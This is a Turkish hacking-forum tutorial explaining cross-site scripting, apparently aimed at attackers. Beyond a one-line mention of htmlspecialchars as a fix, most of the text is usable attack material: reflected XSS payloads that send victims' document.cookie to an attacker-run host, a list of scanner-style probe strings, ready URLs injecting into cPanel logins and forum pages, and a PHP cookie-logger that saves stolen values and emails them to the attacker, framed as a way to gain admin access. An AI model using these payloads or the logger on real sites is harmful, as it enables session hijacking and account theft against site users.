XSS Nedir?

XSS nedir ?

xss sistemlerdeki script açıklarıdır...
Arama Modullerinde , Profil Panellerinde haber modullerinde shutbox vs.. bulunur.. Bu modullere ufak scriptler ekleyerek sitenin yönlenmesini ya da hata vermesini sağlarız..

örn :

[url]http://localhost/hedefdeneme/index.php?content=<h1>Security[at]Rawkmetal[dot]com[/url]

[url]http://localhost/asp-hedef/newcat.asp?tagx=<h1>Security[at]Rawkmetal[dot]com[/url]


devam edelim...

Xss Hangi Sistemler Kullanılır..

Xss Genellikle Php-Nuke ya da Php ile yapılmış sistemlere kullanılır. Ama Asp'de kullanılmaz anlamına gelmez. Asp için daha çok SQL İnjection dediğimiz tablo isimlerine yapılan illegal girişimlerdir..

Biraz daha örnekleyerek anlatalım..

Asp , Php farketmez :

">nedirbu<"font%20size=20>OwNz b7 ********%20:P</font>

basit bir arama scriptinde kullanılıcak açık..

Yukardaki Xss yi biraz daha açalım .(php)

( $_POST / $_SESSION , $_GET ) Php de arama yaparken verdiğimiz komut budur..

Session'da $username adlı bir değişken var diyelim.Sayfada echo'landığı $_SESSION['variable'] şeklinde ekrana basılmadığı zaman url üzerinde sayfa.php?username=XSS girdiğimizde oturumdaki kullanıcıyı değil adres satırından gelen variable'ı ekrana basacaktır.

ama xss den verimli sonuç alabilmek için scrtiptin içinde java script çalıştırmak gerekir...

Güvenlik İçin :

strip_tags() ya da htmlspecialchars komutlarıyla bu açığı kapatabiliriz.

Java Scripti Neden Çalıştırırız?

Cookie Almak için Biraz Script Yazalım.
Altaki Mini Scriptler Vasıtasıyla Cookie Almamızı ve Siteye Admin Yetkisinden Ulaşmamızı Sağlar.

<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>

<script>alert('wvs-xss-magic-string-${random}');</script>

'><script>alert('wvs-xss-magic-string-${random}');</script>

"><script>alert('wvs-xss-magic-string-${random}');</script>

><script>alert('wvs-xss-magic-string-${random}');</script>

</textarea><script>alert('wvs-xss-magic-string-${random}');</script>

<script>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>

><script>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>

</textarea>var%20wvs_xss_test_variable=${random};alert(wvs_xss_test_variable);</script>

--><script>alert('wvs-xss-magic-string-${random}');</script>

Cookie Almak İçin

<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("mailadresiniz@mail.com","Şifre Geldi çip çip ","http://www.site.com/ekledik.txt",'From: [email]Taze_Kek@geldi.com');[/email]
?>

chmod ayarını 777 yapmak lazım yoksa gelen cookie kaydetmez

Örnek

:2082/login?user=**<SCRIPT>location.href='http://www.siteniz.com/kekle.php?c='escape(document. cookie)</script>

/users.php?f=1&s=1'<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>&w=asc&d=50

comments.php?id=1"<script>document.location='http://www.sizinsiteniz.com/xss/?'+escape(document.cookie)</script>

/modules.php?f=1&s=1'%3CXML SRC="javascript:alert('hacked by oturgaçlı götüreç');"%3E

:2082/login?user=**<SCRIPT>location.href='http://www.siteniz.com/kekle.php?c='escape(document. cookie)</script>

gibi

Kaynak: Gökhan Afakan
Tarih:
Hit: 18332
Yazar: Rawkmetal

Taglar: xss nedir?


Yorumlar


Siftahı yapan siz olun
Yorum yapabilmek için üye girişi yapmalısınız.